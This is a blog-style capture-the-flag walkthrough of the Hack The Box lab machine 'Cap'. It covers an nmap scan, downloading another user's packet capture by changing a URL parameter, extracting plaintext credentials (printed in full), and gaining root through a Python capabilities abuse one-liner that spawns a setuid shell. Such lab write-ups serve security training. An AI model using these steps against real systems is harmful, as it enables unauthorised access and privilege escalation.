HTB Walkthrough : Cap

Today we come with another challenge from Hackthebox called cap . This is easy level machine in which non encrypted traffic was going on and using Wireshark we analyze the traffic .So without wasting time let start the machine.

Level : Easy

Attacking Strategy

  • Network Scanning
    • Nmap
  • Enumeration
    • PCAP dump
    • Analyze pcap file
    • extract Credentials from pcap file
  • Privilege Escalation
    • Abusing capabilities


IP Address :

We start with nmap scan with default -sC script and -sV version scanning to perform the banner grabbing on server . Nmap reveals some service and ports are open on target like port 21 FTP , port 22 SSH, Port 80 HTTP.

nmap -sC -sV -p-
Nmap scan report for
Host is up (0.11s latency).
Not shown: 65463 filtered ports, 69 closed ports
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Fri, 20 Aug 2021 16:22:54 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 20 Aug 2021 16:22:48 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Fri, 20 Aug 2021 16:22:48 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, GET, HEAD
|     Content-Length: 0
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
|     </body>
|_    </html>
|_http-server-header: gunicorn

On port 21 i.e FTP anonymous login is not available and this version is not exploitable directly,then we move on port 80 and start enumeration .After some time we got the information from profile like username “Nathan” , etc.


The landing page have one more functionality for taking the snapshot for analysis .we download the some pcap file for analysis. Now we start enumerating the file and start enumeration about services or any other details. After some time we simply try to get 0.pcap file by changing URL parameter .

0.pcap file have lot of protocols like HTTP, etc . Pcap file is long to understand so we filter the information according the need.After giving sometime we got the credentials. so we simply ssh the service and it worked.

Privilege Escalation

From these credential we ssh to the server. Now its time to get the root, so we start with manual enumeration like checking passwd file , SUID Bit, etc.

Username : nathan

Password : Buck3tH4TF0RM3!

Username and Password from PCAP file

After some time we get to know that we can abuse the capabilities i.e we can use python to abuse, GTFOBins show how to abuse the capabilities . After successful exploitation we got the root and collect the flags .

getcap -r / 2>/dev/null
python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.